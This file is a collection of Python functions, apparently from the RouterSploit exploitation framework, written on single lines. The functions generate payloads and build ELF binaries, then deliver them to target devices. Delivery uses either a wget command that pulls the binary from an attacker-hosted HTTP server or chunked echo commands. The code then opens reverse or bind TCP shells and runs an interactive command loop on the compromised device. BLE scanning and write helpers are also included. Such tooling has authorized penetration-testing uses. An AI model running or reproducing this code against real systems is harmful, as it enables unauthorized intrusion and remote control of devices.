def bind_tcp(self): # execute binary commands = self.build_commands() # synchronized commands for command in commands[:-1]: self.exploit.execute(command) # asynchronous last command to execute binary & rm binary thread = threading.Thread(target=self.exploit.execute, args=(commands[-1], )) thread.start() # connecting to shell print_status("Connecting to {}:{}".format(self.options['rhost'], self.options['rport'])) time.sleep(2) try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect((self.options["rhost"], int(self.options["rport"]))) except socket.error: print_error("Could not connect to {}:{}".format( self.options["rhost"], self.options["rport"])) return print_success("Enjoy your shell") tn = telnetlib.Telnet() tn.sock = sock tn.interact()
def run(self): print_status("Generating payload") try: data = self.generate() except OptionValidationError as e: print_error(e) return if self.output == "elf": with open(self.filepath, "wb+") as f: print_status("Building ELF payload") content = self.generate_elf(data) print_success("Saving file {}".format(self.filepath)) f.write(content) elif self.output == "c": print_success("Bulding payload for C") content = self.generate_c(data) print_info(content) elif self.output == "python": print_success("Building payload for python") content = self.generate_python(data) print_info(content) else: raise OptionValidationError("No such option as {}".format( self.output)) return content
def run(self): print_status("Generating payload") payload = self.generate() if self.encoder: payload = self.encoder.encode(payload) if self.fmt: payload = self.fmt.format(payload) print_info(payload) return payload
def http_server(self, lhost, lport): print_status("Setting up HTTP server") try: server = HttpServer((lhost, int(lport)), HttpRequestHandler) except socket.error: self.port_used = True self.mutex = False return None self.mutex = False server.serve_forever(self.payload) server.server_close()
def connect(self) -> bool: """ Connect to TCP server :return bool: True if connection was successful, False otherwise """ try: self.tcp_client.connect((self.tcp_target, self.tcp_port)) print_status(self.peer, "TCP Connection established", verbose=self.verbosity) return True except Exception as err: print_error(self.peer, "TCP Error while connecting to the server", err, verbose=self.verbosity) return False
def write(self, characteristic, data): try: dev = Peripheral(self, self.addrType) services = sorted(dev.services, key=lambda s: s.hndStart) print_status( "Searching for characteristic {}".format(characteristic)) char = None for service in services: if char is not None: break for _, c in enumerate(service.getCharacteristics()): if str(c.uuid) == characteristic: char = c break if char: if "WRITE" in char.propertiesToString(): print_success("Sending {} bytes...".format(len(data))) wwrflag = False if "NO RESPONSE" in char.propertiesToString(): wwrflag = True try: char.write(data, wwrflag) print_success("Data sent") except Exception as err: print_error("Error: {}".format(err)) else: print_error("Not writable") dev.disconnect() except Exception as err: print_error(err) try: dev.disconnect() except Exception: pass return None
def enumerate_services(self): print_status("Starting enumerating {} ({} dBm) ...".format( self.addr, self.rssi)) try: dev = Peripheral(self, self.addrType) services = sorted(dev.services, key=lambda s: s.hndStart) data = [] for service in services: if service.hndStart == service.hndEnd: continue data.append([ "{:04x} -> {:04x}".format(service.hndStart, service.hndEnd), self._get_svc_description(service), "", "", ]) for _, char in enumerate(service.getCharacteristics()): desc = self._get_char_description(char) props = char.propertiesToString() hnd = char.getHandle() value = self._get_char(char, props) data.append(["{:04x}".format(hnd), desc, props, value]) dev.disconnect() return data except Exception as err: print_error(err) try: dev.disconnect() except Exception as err: print_error(err) return None
def btle_scan(self, mac=None): """ Scans for Bluetooth Low Energy devices """ options = Options(self.buffering, mac, self.enum_services) scanner = BTLEScanner(options.mac).withDelegate(ScanDelegate(options)) if options.mac: print_status("Scanning BTLE device...") else: print_status("Scanning for BTLE devices...") devices = [] try: devices = [res for res in scanner.scan(self.scan_time)] except Exception as err: print_error("Error: {}".format(err)) print_error("Check if your bluetooth hardware is connected") return devices
def reverse_tcp(self): all_interfaces = "0.0.0.0" sock = self.listen(all_interfaces, self.options["lport"]) if self.port_used: print_error("Could not set up listener on {}:{}".format( all_interfaces, self.options["lport"])) return # execute binary commands = self.build_commands() print_status("Executing payload on the device") # synchronized commands for command in commands[:-1]: self.exploit.execute(command) # asynchronous last command to execute binary & rm binary thread = threading.Thread(target=self.exploit.execute, args=(commands[-1], )) thread.start() # waiting for shell print_status("Waiting for reverse shell...") client, addr = sock.accept() sock.close() print_status("Connection from {}:{}".format(addr[0], addr[1])) print_success("Enjoy your shell") t = telnetlib.Telnet() t.sock = client t.interact()
def wget(self): print_status("Using wget method") self.binary_name = random_text(8) if "binary" in self.wget_options.keys(): binary = self.wget_options['binary'] else: binary = "wget" # run http server all_interfaces = "0.0.0.0" try: server = HttpServer((all_interfaces, int(self.options["lport"])), HttpRequestHandler) except socket.error: print_error("Could not set up HTTP Server on {}:{}".format( self.options["lhost"], self.options["lport"])) return False thread = threading.Thread(target=server.serve_forever, args=(self.payload, )) thread.start() # wget binary print_status("Using wget to download binary") cmd = "{} http://{}:{}/{} -qO {}/{}".format( binary, self.options["lhost"], self.options["lport"], self.binary_name, self.location, self.binary_name) self.exploit.execute(cmd) thread.join(10) if thread.is_alive(): assassin = threading.Thread(target=server.shutdown) assassin.daemon = True assassin.start() return False return True
def echo(self): print_status("Using echo method") self.binary_name = random_text(8) path = "{}/{}".format(self.location, self.binary_name) # echo stream e.g. echo -ne {} >> {} if "stream" in self.echo_options.keys(): echo_stream = self.echo_options["stream"] else: echo_stream = 'echo -ne "{}" >> {}' # echo prefix e.g. "\\x" if "prefix" in self.echo_options.keys(): echo_prefix = self.echo_options["prefix"] else: echo_prefix = "\\x" # echo max length of the block if "max_length" in self.echo_options.keys(): echo_max_length = int(self.echo_options["max_length"]) else: echo_max_length = 30 size = len(self.payload) num_parts = int(size / echo_max_length) + 1 # transfer binary through echo command print_status("Sending payload to {}".format(path)) for i in range(0, num_parts): current = i * echo_max_length print_status("Transferring {}/{} bytes".format( current, len(self.payload))) block = str( binascii.hexlify(self.payload[current:current + echo_max_length]), "utf-8") block = echo_prefix + echo_prefix.join( a + b for a, b in zip(block[::2], block[1::2])) cmd = echo_stream.format(block, path) self.exploit.execute(cmd)
def run_threads(self, threads_number: int, target_function: any, *args, **kwargs) -> None: """ Run function across specified number of threads :param int thread_number: number of threads that should be executed :param func target_function: function that should be executed accross specified number of threads :param any args: args passed to target_function :param any kwargs: kwargs passed to target function :return None """ threads = [] threads_running = threading.Event() threads_running.set() for thread_id in range(int(threads_number)): thread = threading.Thread( target=target_function, args=chain((threads_running, ), args), kwargs=kwargs, name="thread-{}".format(thread_id), ) threads.append(thread) print_status("{} thread is starting...".format(thread.name)) thread.start() start = time.time() try: while thread.isAlive(): thread.join(1) except KeyboardInterrupt: threads_running.clear() for thread in threads: thread.join() print_status("{} thread is terminated.".format(thread.name)) print_status("Elapsed time: {} seconds".format(time.time() - start))
def shell(exploit, architecture="", method="", payloads=None, **params): available_payloads = {} payload = None options = [] if architecture and method: path = "routersploit/modules/payloads/{}/".format(architecture) # get all payloads for given architecture all_payloads = [ f.split(".")[0] for f in listdir(path) if isfile(join(path, f)) and f.endswith(".py") and f != "__init__.py" ] payload_path = path.replace("/", ".") for p in all_payloads: module = getattr( importlib.import_module("{}{}".format(payload_path, p)), 'Payload') # if method/arch is cmd then filter out payloads if method is "cmd": if getattr(module, "cmd") in payloads: available_payloads[p] = module else: available_payloads[p] = module print_info() print_success( "Welcome to cmd. Commands are sent to the target via the execute method." ) print_status( "For further exploitation use 'show payloads' and 'set payload <payload>' commands." ) print_info() while True: while not printer_queue.empty(): pass if payload is None: cmd_str = "\001\033[4m\002cmd\001\033[0m\002 > " else: cmd_str = "\001\033[4m\002cmd\001\033[0m\002 (\033[94m{}\033[0m) > ".format( payload._Payload__info__["name"]) cmd = input(cmd_str) if cmd in ["quit", "exit"]: return elif cmd == "show payloads": if not available_payloads: print_error("There are no available payloads for this exploit") continue print_status("Available payloads:") headers = ("Payload", "Name", "Description") data = [] for p in available_payloads.keys(): data.append( (p, available_payloads[p]._Payload__info__["name"], available_payloads[p]._Payload__info__["description"])) print_table(headers, *data) elif cmd.startswith("set payload "): if not available_payloads: print_error("There are no available payloads for this exploit") continue c = cmd.split(" ") if c[2] in available_payloads.keys(): payload = available_payloads[c[2]]() options = [] for option in payload.exploit_attributes.keys(): if option not in ["output", "filepath"]: options.append([ option, getattr(payload, option), payload.exploit_attributes[option][1] ]) if payload.handler == "bind_tcp": options.append( ["rhost", exploit.target, "Target IP address"]) if method == "wget": options.append( ["lhost", "", "Connect-back IP address for wget"]) options.append( ["lport", 4545, "Connect-back Port for wget"]) else: print_error("Payload not available") elif payload is not None: if cmd == "show options": headers = ("Name", "Current settings", "Description") print_info('\nPayload Options:') print_table(headers, *options) print_info() elif cmd.startswith("set "): c = cmd.split(" ") if len(c) != 3: print_error("set <option> <value>") else: for option in options: if option[0] == c[1]: try: setattr(payload, c[1], c[2]) except Exception: print_error("Invalid value for {}".format( c[1])) break option[1] = c[2] print_info("{} => {}".format(c[1], c[2])) elif cmd == "run": data = payload.generate() if method == "wget": elf_binary = payload.generate_elf(data) communication = Communication(exploit, elf_binary, options, **params) if communication.wget() is False: print_error("Exploit failed to transfer payload") continue elif method == "echo": elf_binary = payload.generate_elf(data) communication = Communication(exploit, elf_binary, options, **params) communication.echo() elif method == "cmd": params["exec_binary"] = data communication = Communication(exploit, "", options, **params) if payload.handler == "bind_tcp": communication.bind_tcp() elif payload.handler == "reverse_tcp": communication.reverse_tcp() elif cmd == "back": payload = None else: print_status("Executing '{}' on the device...".format(cmd)) print_info(exploit.execute(cmd))